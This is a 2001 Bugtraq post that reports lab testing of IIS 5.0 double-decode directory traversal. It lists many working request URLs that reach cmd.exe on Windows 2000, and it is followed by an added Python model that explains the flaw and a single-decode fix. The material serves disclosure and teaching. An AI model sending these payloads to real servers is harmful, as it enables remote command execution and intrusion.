Bugtraq mailing list archives
Nsfocus advisory testing
From: Aldo Albuquerque - Segurança de Sistemas <aldo () cesar org br>
Date: Wed, 16 May 2001 00:18:05 -0300
Hi,

We tested various settings in our lab, with different encoding combinations, executable directories, and Win32 configurations. Curiously, not all combinations worked quite the same way on Windows 2000 Server and Professional (even discounting the fact that certain directories exist in one and not in the other, like PBServer or Rpc).

- Windows 2000 Professional + SP1 + IIS5.0 - Default installation

* The following combinations of directories/encodings work:

http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

- Windows 2000 Server + SP1 + IIS5.0 - Default installation

* The following combinations of directories/encodings work:

http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

It would be interesting if tests were also made by others on NT 4.0 SP6a, since we did not test combinations with other commonly installed directories, such as cgi-bin, adsamples, _vti_cnf, iisadmpwd, etc.

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife - http://www.cesar.org.br
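Every request in the message spells the backslash in one of four ways (%255c, %%35c, %%35%63, %25%35%63), and each of them becomes %5c after one round of %-decoding and a real backslash only after a second round. What follows is an added example, not part of the message above and not IIS's own code: a small Python model of a server that decodes the request path once, checks that it stays inside the virtual root, and then decodes it a second time while building the physical path, next to a variant that decodes exactly once. The virtual-root layout, the sample request paths, and all function names are constructed for the example, and the "fixed" variant is the generic single-decode design, not Microsoft's actual patch.

```python
"""Model of the double-decode path check (added example; constructed layout)."""
import re

_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def percent_decode_once(s):
    """One pass of %XX decoding.  Malformed escapes such as '%%' are left
    alone, which is exactly what lets '%%35c' come out of pass one as '%5c'."""
    return _PCT.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_chain(s):
    """Decode repeatedly until nothing changes: '%255c' -> '%5c' -> '\\'."""
    chain = [s]
    while True:
        nxt = percent_decode_once(chain[-1])
        if nxt == chain[-1]:
            return chain
        chain.append(nxt)


# The four backslash spellings from the message.
BACKSLASH_SPELLINGS = ["%255c", "%%35c", "%%35%63", "%25%35%63"]

# Assumed virtual-root layout, constructed for this example.
VROOTS = {
    "/msadc": "C:/Program Files/Common Files/System/msadc",
    "/_vti_bin": "C:/Program Files/Common Files/Microsoft Shared/"
                 "Web Server Extensions/40/isapi",
}


def split_vroot(path):
    """Map a request path to (physical root, remainder), case-insensitively."""
    for prefix, phys in VROOTS.items():
        if path.lower().startswith(prefix.lower() + "/"):
            return phys, path[len(prefix):]
    return None, path


def resolve(path, seps):
    """Collapse '.' and '..' segments, splitting on the characters in seps.
    Returns (segments, climbed_out); climbed_out is True when a '..' tried
    to go above the starting point."""
    parts, climbed_out = [], False
    for seg in re.split("[" + re.escape(seps) + "]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                climbed_out = True
            continue
        parts.append(seg)
    return parts, climbed_out


def to_filesystem(physical):
    """What Windows sees: '/' and '\\' both separate names, '..' stops at the drive."""
    drive, _, rest = physical.partition("/")
    parts, _ = resolve(rest, "\\/")
    return drive + "/" + "/".join(parts)


def vulnerable_server(url_path):
    """Decode, check, then decode AGAIN while building the physical path."""
    once = percent_decode_once(url_path)
    phys_root, rel = split_vroot(once)
    if phys_root is None:
        return "404"
    # The check runs on the once-decoded path.  Here '%5c' is still three
    # ordinary characters, so '..%5c..' is just an odd directory name and a
    # plainly encoded '..%5c' (which is now '..\') is correctly rejected.
    _, climbed_out = resolve(rel, "\\/")
    if climbed_out:
        return "403"
    # The bug: a second decode turns '%5c' into '\' after the check passed.
    return to_filesystem(phys_root + "/" + percent_decode_once(rel))


def fixed_server(url_path):
    """Decode exactly once: the bytes checked are the bytes that reach the disk."""
    once = percent_decode_once(url_path)
    phys_root, rel = split_vroot(once)
    if phys_root is None:
        return "404"
    _, climbed_out = resolve(rel, "\\/")
    if climbed_out:
        return "403"
    return to_filesystem(phys_root + "/" + rel)


if __name__ == "__main__":
    for spelling in BACKSLASH_SPELLINGS:
        print(spelling, "->", " -> ".join(repr(x) for x in decode_chain(spelling)[1:]))
    attack = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe"
    print("vulnerable:", vulnerable_server(attack))
    print("fixed:     ", fixed_server(attack))
```

The model also shows why the number of `..` hops in the message varies by directory: the traversal only needs to climb at least as far as the drive root, and extra hops are harmless because the filesystem clamps at the drive, so the deeper _vti_bin root simply takes more hops than PBServer or Rpc.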